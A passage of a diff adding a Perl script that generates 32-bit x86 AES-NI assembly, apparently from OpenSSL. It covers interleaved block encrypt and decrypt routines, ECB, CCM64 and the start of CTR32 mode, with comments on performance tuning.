+# on 2x subroutine on Atom Silvermont account. For processors that
+# can schedule aes[enc|dec] every cycle optimal interleave factor
+# equals to corresponding instructions latency. 8x is optimal for
+# * Bridge, but it's unfeasible to accommodate such implementation
+# in XMM registers addreassable in 32-bit mode and therefore maximum
+# of 6x is used instead...
+
+sub aesni_generate2
+{ my $p=shift;
+
+    &function_begin_B("_aesni_${p}rypt2");
+	&$movekey	($rndkey0,&QWP(0,$key));
+	&shl		($rounds,4);
+	&$movekey	($rndkey1,&QWP(16,$key));
+	&xorps		($inout0,$rndkey0);
+	&pxor		($inout1,$rndkey0);
+	&$movekey	($rndkey0,&QWP(32,$key));
+	&lea		($key,&DWP(32,$key,$rounds));
+	&neg		($rounds);
+	&add		($rounds,16);
+
+    &set_label("${p}2_loop");
+	eval"&aes${p}	($inout0,$rndkey1)";
+	eval"&aes${p}	($inout1,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	eval"&aes${p}	($inout0,$rndkey0)";
+	eval"&aes${p}	($inout1,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+	&jnz		(&label("${p}2_loop"));
+    eval"&aes${p}	($inout0,$rndkey1)";
+    eval"&aes${p}	($inout1,$rndkey1)";
+    eval"&aes${p}last	($inout0,$rndkey0)";
+    eval"&aes${p}last	($inout1,$rndkey0)";
+    &ret();
+    &function_end_B("_aesni_${p}rypt2");
+}
+
+sub aesni_generate3
+{ my $p=shift;
+
+    &function_begin_B("_aesni_${p}rypt3");
+	&$movekey	($rndkey0,&QWP(0,$key));
+	&shl		($rounds,4);
+	&$movekey	($rndkey1,&QWP(16,$key));
+	&xorps		($inout0,$rndkey0);
+	&pxor		($inout1,$rndkey0);
+	&pxor		($inout2,$rndkey0);
+	&$movekey	($rndkey0,&QWP(32,$key));
+	&lea		($key,&DWP(32,$key,$rounds));
+	&neg		($rounds);
+	&add		($rounds,16);
+
+    &set_label("${p}3_loop");
+	eval"&aes${p}	($inout0,$rndkey1)";
+	eval"&aes${p}	($inout1,$rndkey1)";
+	eval"&aes${p}	($inout2,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	eval"&aes${p}	($inout0,$rndkey0)";
+	eval"&aes${p}	($inout1,$rndkey0)";
+	eval"&aes${p}	($inout2,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+	&jnz		(&label("${p}3_loop"));
+    eval"&aes${p}	($inout0,$rndkey1)";
+    eval"&aes${p}	($inout1,$rndkey1)";
+    eval"&aes${p}	($inout2,$rndkey1)";
+    eval"&aes${p}last	($inout0,$rndkey0)";
+    eval"&aes${p}last	($inout1,$rndkey0)";
+    eval"&aes${p}last	($inout2,$rndkey0)";
+    &ret();
+    &function_end_B("_aesni_${p}rypt3");
+}
+
+# 4x interleave is implemented to improve small block performance,
+# most notably [and naturally] 4 block by ~30%. One can argue that one
+# should have implemented 5x as well, but improvement  would be <20%,
+# so it's not worth it...
+sub aesni_generate4
+{ my $p=shift;
+
+    &function_begin_B("_aesni_${p}rypt4");
+	&$movekey	($rndkey0,&QWP(0,$key));
+	&$movekey	($rndkey1,&QWP(16,$key));
+	&shl		($rounds,4);
+	&xorps		($inout0,$rndkey0);
+	&pxor		($inout1,$rndkey0);
+	&pxor		($inout2,$rndkey0);
+	&pxor		($inout3,$rndkey0);
+	&$movekey	($rndkey0,&QWP(32,$key));
+	&lea		($key,&DWP(32,$key,$rounds));
+	&neg		($rounds);
+	&data_byte	(0x0f,0x1f,0x40,0x00);
+	&add		($rounds,16);
+
+    &set_label("${p}4_loop");
+	eval"&aes${p}	($inout0,$rndkey1)";
+	eval"&aes${p}	($inout1,$rndkey1)";
+	eval"&aes${p}	($inout2,$rndkey1)";
+	eval"&aes${p}	($inout3,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	eval"&aes${p}	($inout0,$rndkey0)";
+	eval"&aes${p}	($inout1,$rndkey0)";
+	eval"&aes${p}	($inout2,$rndkey0)";
+	eval"&aes${p}	($inout3,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+    &jnz		(&label("${p}4_loop"));
+
+    eval"&aes${p}	($inout0,$rndkey1)";
+    eval"&aes${p}	($inout1,$rndkey1)";
+    eval"&aes${p}	($inout2,$rndkey1)";
+    eval"&aes${p}	($inout3,$rndkey1)";
+    eval"&aes${p}last	($inout0,$rndkey0)";
+    eval"&aes${p}last	($inout1,$rndkey0)";
+    eval"&aes${p}last	($inout2,$rndkey0)";
+    eval"&aes${p}last	($inout3,$rndkey0)";
+    &ret();
+    &function_end_B("_aesni_${p}rypt4");
+}
+
+sub aesni_generate6
+{ my $p=shift;
+
+    &function_begin_B("_aesni_${p}rypt6");
+    &static_label("_aesni_${p}rypt6_enter");
+	&$movekey	($rndkey0,&QWP(0,$key));
+	&shl		($rounds,4);
+	&$movekey	($rndkey1,&QWP(16,$key));
+	&xorps		($inout0,$rndkey0);
+	&pxor		($inout1,$rndkey0);	# pxor does better here
+	&pxor		($inout2,$rndkey0);
+	eval"&aes${p}	($inout0,$rndkey1)";
+	&pxor		($inout3,$rndkey0);
+	&pxor		($inout4,$rndkey0);
+	eval"&aes${p}	($inout1,$rndkey1)";
+	&lea		($key,&DWP(32,$key,$rounds));
+	&neg		($rounds);
+	eval"&aes${p}	($inout2,$rndkey1)";
+	&pxor		($inout5,$rndkey0);
+	&add		($rounds,16);
+	eval"&aes${p}	($inout3,$rndkey1)";
+	eval"&aes${p}	($inout4,$rndkey1)";
+	eval"&aes${p}	($inout5,$rndkey1)";
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+	&jmp		(&label("_aesni_${p}rypt6_enter"));
+
+    &set_label("${p}6_loop",16);
+	eval"&aes${p}	($inout0,$rndkey1)";
+	eval"&aes${p}	($inout1,$rndkey1)";
+	eval"&aes${p}	($inout2,$rndkey1)";
+	eval"&aes${p}	($inout3,$rndkey1)";
+	eval"&aes${p}	($inout4,$rndkey1)";
+	eval"&aes${p}	($inout5,$rndkey1)";
+    &set_label("_aesni_${p}rypt6_enter");
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	eval"&aes${p}	($inout0,$rndkey0)";
+	eval"&aes${p}	($inout1,$rndkey0)";
+	eval"&aes${p}	($inout2,$rndkey0)";
+	eval"&aes${p}	($inout3,$rndkey0)";
+	eval"&aes${p}	($inout4,$rndkey0)";
+	eval"&aes${p}	($inout5,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+    &jnz		(&label("${p}6_loop"));
+
+    eval"&aes${p}	($inout0,$rndkey1)";
+    eval"&aes${p}	($inout1,$rndkey1)";
+    eval"&aes${p}	($inout2,$rndkey1)";
+    eval"&aes${p}	($inout3,$rndkey1)";
+    eval"&aes${p}	($inout4,$rndkey1)";
+    eval"&aes${p}	($inout5,$rndkey1)";
+    eval"&aes${p}last	($inout0,$rndkey0)";
+    eval"&aes${p}last	($inout1,$rndkey0)";
+    eval"&aes${p}last	($inout2,$rndkey0)";
+    eval"&aes${p}last	($inout3,$rndkey0)";
+    eval"&aes${p}last	($inout4,$rndkey0)";
+    eval"&aes${p}last	($inout5,$rndkey0)";
+    &ret();
+    &function_end_B("_aesni_${p}rypt6");
+}
+&aesni_generate2("enc") if ($PREFIX eq "aesni");
+&aesni_generate2("dec");
+&aesni_generate3("enc") if ($PREFIX eq "aesni");
+&aesni_generate3("dec");
+&aesni_generate4("enc") if ($PREFIX eq "aesni");
+&aesni_generate4("dec");
+&aesni_generate6("enc") if ($PREFIX eq "aesni");
+&aesni_generate6("dec");
+
+if ($PREFIX eq "aesni") {
+######################################################################
+# void aesni_ecb_encrypt (const void *in, void *out,
+#                         size_t length, const AES_KEY *key,
+#                         int enc);
+&function_begin("aesni_ecb_encrypt");
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));
+	&mov	($rounds_,&wparam(4));
+	&and	($len,-16);
+	&jz	(&label("ecb_ret"));
+	&mov	($rounds,&DWP(240,$key));
+	&test	($rounds_,$rounds_);
+	&jz	(&label("ecb_decrypt"));
+
+	&mov	($key_,$key);		# backup $key
+	&mov	($rounds_,$rounds);	# backup $rounds
+	&cmp	($len,0x60);
+	&jb	(&label("ecb_enc_tail"));
+
+	&movdqu	($inout0,&QWP(0,$inp));
+	&movdqu	($inout1,&QWP(0x10,$inp));
+	&movdqu	($inout2,&QWP(0x20,$inp));
+	&movdqu	($inout3,&QWP(0x30,$inp));
+	&movdqu	($inout4,&QWP(0x40,$inp));
+	&movdqu	($inout5,&QWP(0x50,$inp));
+	&lea	($inp,&DWP(0x60,$inp));
+	&sub	($len,0x60);
+	&jmp	(&label("ecb_enc_loop6_enter"));
+
+&set_label("ecb_enc_loop6",16);
+	&movups	(&QWP(0,$out),$inout0);
+	&movdqu	($inout0,&QWP(0,$inp));
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movdqu	($inout1,&QWP(0x10,$inp));
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movdqu	($inout2,&QWP(0x20,$inp));
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movdqu	($inout3,&QWP(0x30,$inp));
+	&movups	(&QWP(0x40,$out),$inout4);
+	&movdqu	($inout4,&QWP(0x40,$inp));
+	&movups	(&QWP(0x50,$out),$inout5);
+	&lea	($out,&DWP(0x60,$out));
+	&movdqu	($inout5,&QWP(0x50,$inp));
+	&lea	($inp,&DWP(0x60,$inp));
+&set_label("ecb_enc_loop6_enter");
+
+	&call	("_aesni_encrypt6");
+
+	&mov	($key,$key_);		# restore $key
+	&mov	($rounds,$rounds_);	# restore $rounds
+	&sub	($len,0x60);
+	&jnc	(&label("ecb_enc_loop6"));
+
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movups	(&QWP(0x40,$out),$inout4);
+	&movups	(&QWP(0x50,$out),$inout5);
+	&lea	($out,&DWP(0x60,$out));
+	&add	($len,0x60);
+	&jz	(&label("ecb_ret"));
+
+&set_label("ecb_enc_tail");
+	&movups	($inout0,&QWP(0,$inp));
+	&cmp	($len,0x20);
+	&jb	(&label("ecb_enc_one"));
+	&movups	($inout1,&QWP(0x10,$inp));
+	&je	(&label("ecb_enc_two"));
+	&movups	($inout2,&QWP(0x20,$inp));
+	&cmp	($len,0x40);
+	&jb	(&label("ecb_enc_three"));
+	&movups	($inout3,&QWP(0x30,$inp));
+	&je	(&label("ecb_enc_four"));
+	&movups	($inout4,&QWP(0x40,$inp));
+	&xorps	($inout5,$inout5);
+	&call	("_aesni_encrypt6");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movups	(&QWP(0x40,$out),$inout4);
+	jmp	(&label("ecb_ret"));
+
+&set_label("ecb_enc_one",16);
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&movups	(&QWP(0,$out),$inout0);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_enc_two",16);
+	&call	("_aesni_encrypt2");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_enc_three",16);
+	&call	("_aesni_encrypt3");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_enc_four",16);
+	&call	("_aesni_encrypt4");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&jmp	(&label("ecb_ret"));
+######################################################################
+&set_label("ecb_decrypt",16);
+	&mov	($key_,$key);		# backup $key
+	&mov	($rounds_,$rounds);	# backup $rounds
+	&cmp	($len,0x60);
+	&jb	(&label("ecb_dec_tail"));
+
+	&movdqu	($inout0,&QWP(0,$inp));
+	&movdqu	($inout1,&QWP(0x10,$inp));
+	&movdqu	($inout2,&QWP(0x20,$inp));
+	&movdqu	($inout3,&QWP(0x30,$inp));
+	&movdqu	($inout4,&QWP(0x40,$inp));
+	&movdqu	($inout5,&QWP(0x50,$inp));
+	&lea	($inp,&DWP(0x60,$inp));
+	&sub	($len,0x60);
+	&jmp	(&label("ecb_dec_loop6_enter"));
+
+&set_label("ecb_dec_loop6",16);
+	&movups	(&QWP(0,$out),$inout0);
+	&movdqu	($inout0,&QWP(0,$inp));
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movdqu	($inout1,&QWP(0x10,$inp));
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movdqu	($inout2,&QWP(0x20,$inp));
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movdqu	($inout3,&QWP(0x30,$inp));
+	&movups	(&QWP(0x40,$out),$inout4);
+	&movdqu	($inout4,&QWP(0x40,$inp));
+	&movups	(&QWP(0x50,$out),$inout5);
+	&lea	($out,&DWP(0x60,$out));
+	&movdqu	($inout5,&QWP(0x50,$inp));
+	&lea	($inp,&DWP(0x60,$inp));
+&set_label("ecb_dec_loop6_enter");
+
+	&call	("_aesni_decrypt6");
+
+	&mov	($key,$key_);		# restore $key
+	&mov	($rounds,$rounds_);	# restore $rounds
+	&sub	($len,0x60);
+	&jnc	(&label("ecb_dec_loop6"));
+
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movups	(&QWP(0x40,$out),$inout4);
+	&movups	(&QWP(0x50,$out),$inout5);
+	&lea	($out,&DWP(0x60,$out));
+	&add	($len,0x60);
+	&jz	(&label("ecb_ret"));
+
+&set_label("ecb_dec_tail");
+	&movups	($inout0,&QWP(0,$inp));
+	&cmp	($len,0x20);
+	&jb	(&label("ecb_dec_one"));
+	&movups	($inout1,&QWP(0x10,$inp));
+	&je	(&label("ecb_dec_two"));
+	&movups	($inout2,&QWP(0x20,$inp));
+	&cmp	($len,0x40);
+	&jb	(&label("ecb_dec_three"));
+	&movups	($inout3,&QWP(0x30,$inp));
+	&je	(&label("ecb_dec_four"));
+	&movups	($inout4,&QWP(0x40,$inp));
+	&xorps	($inout5,$inout5);
+	&call	("_aesni_decrypt6");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movups	(&QWP(0x40,$out),$inout4);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_dec_one",16);
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&movups	(&QWP(0,$out),$inout0);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_dec_two",16);
+	&call	("_aesni_decrypt2");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_dec_three",16);
+	&call	("_aesni_decrypt3");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&jmp	(&label("ecb_ret"));
+
+&set_label("ecb_dec_four",16);
+	&call	("_aesni_decrypt4");
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+
+&set_label("ecb_ret");
+&function_end("aesni_ecb_encrypt");
+
+######################################################################
+# void aesni_ccm64_[en|de]crypt_blocks (const void *in, void *out,
+#                         size_t blocks, const AES_KEY *key,
+#                         const char *ivec,char *cmac);
+#
+# Handles only complete blocks, operates on 64-bit counter and
+# does not update *ivec! Nor does it finalize CMAC value
+# (see engine/eng_aesni.c for details)
+#
+{ my $cmac=$inout1;
+&function_begin("aesni_ccm64_encrypt_blocks");
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));
+	&mov	($rounds_,&wparam(4));
+	&mov	($rounds,&wparam(5));
+	&mov	($key_,"esp");
+	&sub	("esp",60);
+	&and	("esp",-16);			# align stack
+	&mov	(&DWP(48,"esp"),$key_);
+
+	&movdqu	($ivec,&QWP(0,$rounds_));	# load ivec
+	&movdqu	($cmac,&QWP(0,$rounds));	# load cmac
+	&mov	($rounds,&DWP(240,$key));
+
+	# compose byte-swap control mask for pshufb on stack
+	&mov	(&DWP(0,"esp"),0x0c0d0e0f);
+	&mov	(&DWP(4,"esp"),0x08090a0b);
+	&mov	(&DWP(8,"esp"),0x04050607);
+	&mov	(&DWP(12,"esp"),0x00010203);
+
+	# compose counter increment vector on stack
+	&mov	($rounds_,1);
+	&xor	($key_,$key_);
+	&mov	(&DWP(16,"esp"),$rounds_);
+	&mov	(&DWP(20,"esp"),$key_);
+	&mov	(&DWP(24,"esp"),$key_);
+	&mov	(&DWP(28,"esp"),$key_);
+
+	&shl	($rounds,4);
+	&mov	($rounds_,16);
+	&lea	($key_,&DWP(0,$key));
+	&movdqa	($inout3,&QWP(0,"esp"));
+	&movdqa	($inout0,$ivec);
+	&lea	($key,&DWP(32,$key,$rounds));
+	&sub	($rounds_,$rounds);
+	&pshufb	($ivec,$inout3);
+
+&set_label("ccm64_enc_outer");
+	&$movekey	($rndkey0,&QWP(0,$key_));
+	&mov		($rounds,$rounds_);
+	&movups		($in0,&QWP(0,$inp));
+
+	&xorps		($inout0,$rndkey0);
+	&$movekey	($rndkey1,&QWP(16,$key_));
+	&xorps		($rndkey0,$in0);
+	&xorps		($cmac,$rndkey0);		# cmac^=inp
+	&$movekey	($rndkey0,&QWP(32,$key_));
+
+&set_label("ccm64_enc2_loop");
+	&aesenc		($inout0,$rndkey1);
+	&aesenc		($cmac,$rndkey1);
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	&aesenc		($inout0,$rndkey0);
+	&aesenc		($cmac,$rndkey0);
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+	&jnz		(&label("ccm64_enc2_loop"));
+	&aesenc		($inout0,$rndkey1);
+	&aesenc		($cmac,$rndkey1);
+	&paddq		($ivec,&QWP(16,"esp"));
+	&dec		($len);
+	&aesenclast	($inout0,$rndkey0);
+	&aesenclast	($cmac,$rndkey0);
+
+	&lea	($inp,&DWP(16,$inp));
+	&xorps	($in0,$inout0);			# inp^=E(ivec)
+	&movdqa	($inout0,$ivec);
+	&movups	(&QWP(0,$out),$in0);		# save output
+	&pshufb	($inout0,$inout3);
+	&lea	($out,&DWP(16,$out));
+	&jnz	(&label("ccm64_enc_outer"));
+
+	&mov	("esp",&DWP(48,"esp"));
+	&mov	($out,&wparam(5));
+	&movups	(&QWP(0,$out),$cmac);
+&function_end("aesni_ccm64_encrypt_blocks");
+
+&function_begin("aesni_ccm64_decrypt_blocks");
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));
+	&mov	($rounds_,&wparam(4));
+	&mov	($rounds,&wparam(5));
+	&mov	($key_,"esp");
+	&sub	("esp",60);
+	&and	("esp",-16);			# align stack
+	&mov	(&DWP(48,"esp"),$key_);
+
+	&movdqu	($ivec,&QWP(0,$rounds_));	# load ivec
+	&movdqu	($cmac,&QWP(0,$rounds));	# load cmac
+	&mov	($rounds,&DWP(240,$key));
+
+	# compose byte-swap control mask for pshufb on stack
+	&mov	(&DWP(0,"esp"),0x0c0d0e0f);
+	&mov	(&DWP(4,"esp"),0x08090a0b);
+	&mov	(&DWP(8,"esp"),0x04050607);
+	&mov	(&DWP(12,"esp"),0x00010203);
+
+	# compose counter increment vector on stack
+	&mov	($rounds_,1);
+	&xor	($key_,$key_);
+	&mov	(&DWP(16,"esp"),$rounds_);
+	&mov	(&DWP(20,"esp"),$key_);
+	&mov	(&DWP(24,"esp"),$key_);
+	&mov	(&DWP(28,"esp"),$key_);
+
+	&movdqa	($inout3,&QWP(0,"esp"));	# bswap mask
+	&movdqa	($inout0,$ivec);
+
+	&mov	($key_,$key);
+	&mov	($rounds_,$rounds);
+
+	&pshufb	($ivec,$inout3);
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&shl	($rounds_,4);
+	&mov	($rounds,16);
+	&movups	($in0,&QWP(0,$inp));		# load inp
+	&paddq	($ivec,&QWP(16,"esp"));
+	&lea	($inp,&QWP(16,$inp));
+	&sub	($rounds,$rounds_);
+	&lea	($key,&DWP(32,$key_,$rounds_));
+	&mov	($rounds_,$rounds);
+	&jmp	(&label("ccm64_dec_outer"));
+
+&set_label("ccm64_dec_outer",16);
+	&xorps	($in0,$inout0);			# inp ^= E(ivec)
+	&movdqa	($inout0,$ivec);
+	&movups	(&QWP(0,$out),$in0);		# save output
+	&lea	($out,&DWP(16,$out));
+	&pshufb	($inout0,$inout3);
+
+	&sub	($len,1);
+	&jz	(&label("ccm64_dec_break"));
+
+	&$movekey	($rndkey0,&QWP(0,$key_));
+	&mov		($rounds,$rounds_);
+	&$movekey	($rndkey1,&QWP(16,$key_));
+	&xorps		($in0,$rndkey0);
+	&xorps		($inout0,$rndkey0);
+	&xorps		($cmac,$in0);		# cmac^=out
+	&$movekey	($rndkey0,&QWP(32,$key_));
+
+&set_label("ccm64_dec2_loop");
+	&aesenc		($inout0,$rndkey1);
+	&aesenc		($cmac,$rndkey1);
+	&$movekey	($rndkey1,&QWP(0,$key,$rounds));
+	&add		($rounds,32);
+	&aesenc		($inout0,$rndkey0);
+	&aesenc		($cmac,$rndkey0);
+	&$movekey	($rndkey0,&QWP(-16,$key,$rounds));
+	&jnz		(&label("ccm64_dec2_loop"));
+	&movups		($in0,&QWP(0,$inp));	# load inp
+	&paddq		($ivec,&QWP(16,"esp"));
+	&aesenc		($inout0,$rndkey1);
+	&aesenc		($cmac,$rndkey1);
+	&aesenclast	($inout0,$rndkey0);
+	&aesenclast	($cmac,$rndkey0);
+	&lea		($inp,&QWP(16,$inp));
+	&jmp	(&label("ccm64_dec_outer"));
+
+&set_label("ccm64_dec_break",16);
+	&mov	($rounds,&DWP(240,$key_));
+	&mov	($key,$key_);
+	if ($inline)
+	{   &aesni_inline_generate1("enc",$cmac,$in0);	}
+	else
+	{   &call	("_aesni_encrypt1",$cmac);	}
+
+	&mov	("esp",&DWP(48,"esp"));
+	&mov	($out,&wparam(5));
+	&movups	(&QWP(0,$out),$cmac);
+&function_end("aesni_ccm64_decrypt_blocks");
+}
+
+######################################################################
+# void aesni_ctr32_encrypt_blocks (const void *in, void *out,
+#                         size_t blocks, const AES_KEY *key,
+#                         const char *ivec);
+#
+# Handles only complete blocks, operates on 32-bit counter and
+# does not update *ivec! (see crypto/modes/ctr128.c for details)
+#
+# stack layout:
+#	0	pshufb mask
+#	16	vector addend: 0,6,6,6
+# 	32	counter-less ivec
+#	48	1st triplet of counter vector
+#	64	2nd triplet of counter vector
+#	80	saved %esp
+
+&function_begin("aesni_ctr32_encrypt_blocks");
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));
+	&mov	($rounds_,&wparam(4));
+	&mov	($key_,"esp");
+	&sub	("esp",88);
+	&and	("esp",-16);			# align stack
+	&mov	(&DWP(80,"esp"),$key_);
+
+	&cmp	($len,1);
+	&je	(&label("ctr32_one_shortcut"));
+
+	&movdqu	($inout5,&QWP(0,$rounds_));	# load ivec
+
+	# compose byte-swap control mask for pshufb on stack
+	&mov	(&DWP(0,"esp"),0x0c0d0e0f);
+	&mov	(&DWP(4,"esp"),0x08090a0b);
+	&mov	(&DWP(8,"esp"),0x04050607);
+	&mov	(&DWP(12,"esp"),0x00010203);
+
+	# compose counter increment vector on stack
+	&mov	($rounds,6);
+	&xor	($key_,$key_);
+	&mov	(&DWP(16,"esp"),$rounds);
+	&mov	(&DWP(20,"esp"),$rounds);
+	&mov	(&DWP(24,"esp"),$rounds);
+	&mov	(&DWP(28,"esp"),$key_);
+
+	&pextrd	($rounds_,$inout5,3);		# pull 32-bit counter
+	&pinsrd	($inout5,$key_,3);		# wipe 32-bit counter
+
+	&mov	($rounds,&DWP(240,$key));	# key->rounds
+
+	# compose 2 vectors of 3x32-bit counters
+	&bswap	($rounds_);
+	&pxor	($rndkey0,$rndkey0);
+	&pxor	($rndkey1,$rndkey1);
+	&movdqa	($inout0,&QWP(0,"esp"));	# load byte-swap mask
+	&pinsrd	($rndkey0,$rounds_,0);
+	&lea	($key_,&DWP(3,$rounds_));
+	&pinsrd	($rndkey1,$key_,0);
+	&inc	($rounds_);
+	&pinsrd	($rndkey0,$rounds_,1);
+	&inc	($key_);
+	&pinsrd	($rndkey1,$key_,1);
+	&inc	($rounds_);
+	&pinsrd	($rndkey0,$rounds_,2);
+	&inc	($key_);
+	&pinsrd	($rndkey1,$key_,2);
+	&movdqa	(&QWP(48,"esp"),$rndkey0);	# save 1st triplet
+	&pshufb	($rndkey0,$inout0);		# byte swap
+	&movdqu	($inout4,&QWP(0,$key));		# key[0]
+	&movdqa	(&QWP(64,"esp"),$rndkey1);	# save 2nd triplet
+	&pshufb	($rndkey1,$inout0);		# byte swap
+
+	&pshufd	($inout0,$rndkey0,3<<6);	# place counter to upper dword
+	&pshufd	($inout1,$rndkey0,2<<6);
+	&cmp	($len,6);
+	&jb	(&label("ctr32_tail"));
+	&pxor	($inout5,$inout4);		# counter-less ivec^key[0]
+	&shl	($rounds,4);
+	&mov	($rounds_,16);
+	&movdqa	(&QWP(32,"esp"),$inout5);	# save counter-less ivec^key[0]
+	&mov	($key_,$key);			# backup $key
+	&sub	($rounds_,$rounds);		# backup twisted $rounds
+	&lea	($key,&DWP(32,$key,$rounds));
+	&sub	($len,6);
+	&jmp	(&label("ctr32_loop6"));
+
+&set_label("ctr32_loop6",16);
+	# inlining _aesni_encrypt6's prologue gives ~6% improvement...
+	&pshufd	($inout2,$rndkey0,1<<6);
+	&movdqa	($rndkey0,&QWP(32,"esp"));	# pull counter-less ivec
+	&pshufd	($inout3,$rndkey1,3<<6);
+	&pxor		($inout0,$rndkey0);	# merge counter-less ivec
+	&pshufd	($inout4,$rndkey1,2<<6);
+	&pxor		($inout1,$rndkey0);
+	&pshufd	($inout5,$rndkey1,1<<6);
+	&$movekey	($rndkey1,&QWP(16,$key_));
+	&pxor		($inout2,$rndkey0);
+	&pxor		($inout3,$rndkey0);
+	&aesenc		($inout0,$rndkey1);
+	&pxor		($inout4,$rndkey0);
+	&pxor		($inout5,$rndkey0);
+	&aesenc		($inout1,$rndkey1);
+	&$movekey	($rndkey0,&QWP(32,$key_));
+	&mov		($rounds,$rounds_);
+	&aesenc		($inout2,$rndkey1);
+	&aesenc		($inout3,$rndkey1);
+	&aesenc		($inout4,$rndkey1);
+	&aesenc		($inout5,$rndkey1);
+
+	&call		(&label("_aesni_encrypt6_enter"));
+
+	&movups	($rndkey1,&QWP(0,$inp));
+	&movups	($rndkey0,&QWP(0x10,$inp));
+	&xorps	($inout0,$rndkey1);
+	&movups	($rndkey1,&QWP(0x20,$inp));
+	&xorps	($inout1,$rndkey0);
+	&movups	(&QWP(0,$out),$inout0);
+	&movdqa	($rndkey0,&QWP(16,"esp"));	# load increment
+	&xorps	($inout2,$rndkey1);
+	&movdqa	($rndkey1,&QWP(64,"esp"));	# load 2nd triplet
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+
+	&paddd	($rndkey1,$rndkey0);		# 2nd triplet increment
+	&paddd	($rndkey0,&QWP(48,"esp"));	# 1st triplet increment
+	&movdqa	($inout0,&QWP(0,"esp"));	# load byte swap mask
+
+	&movups	($inout1,&QWP(0x30,$inp));
+	&movups	($inout2,&QWP(0x40,$inp));
+	&xorps	($inout3,$inout1);
+	&movups	($inout1,&QWP(0x50,$inp));
+	&lea	($inp,&DWP(0x60,$inp));
+	&movdqa	(&QWP(48,"esp"),$rndkey0);	# save 1st triplet
+	&pshufb	($rndkey0,$inout0);		# byte swap
+	&xorps	($inout4,$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&xorps	($inout5,$inout1);
+	&movdqa	(&QWP(64,"esp"),$rndkey1);	# save 2nd triplet
+	&pshufb	($rndkey1,$inout0);		# byte swap
+	&movups	(&QWP(0x40,$out),$inout4);
+	&pshufd	($inout0,$rndkey0,3<<6);
+	&movups	(&QWP(0x50,$out),$inout5);
+	&lea	($out,&DWP(0x60,$out));
+
+	&pshufd	($inout1,$rndkey0,2<<6);
+	&sub	($len,6);
+	&jnc	(&label("ctr32_loop6"));
+
+	&add	($len,6);
+	&jz	(&label("ctr32_ret"));
+	&movdqu	($inout5,&QWP(0,$key_));
+	&mov	($key,$key_);
+	&pxor	($inout5,&QWP(32,"esp"));	# restore count-less ivec
+	&mov	($rounds,&DWP(240,$key_));	# restore $rounds
+
+&set_label("ctr32_tail");
+	&por	($inout0,$inout5);
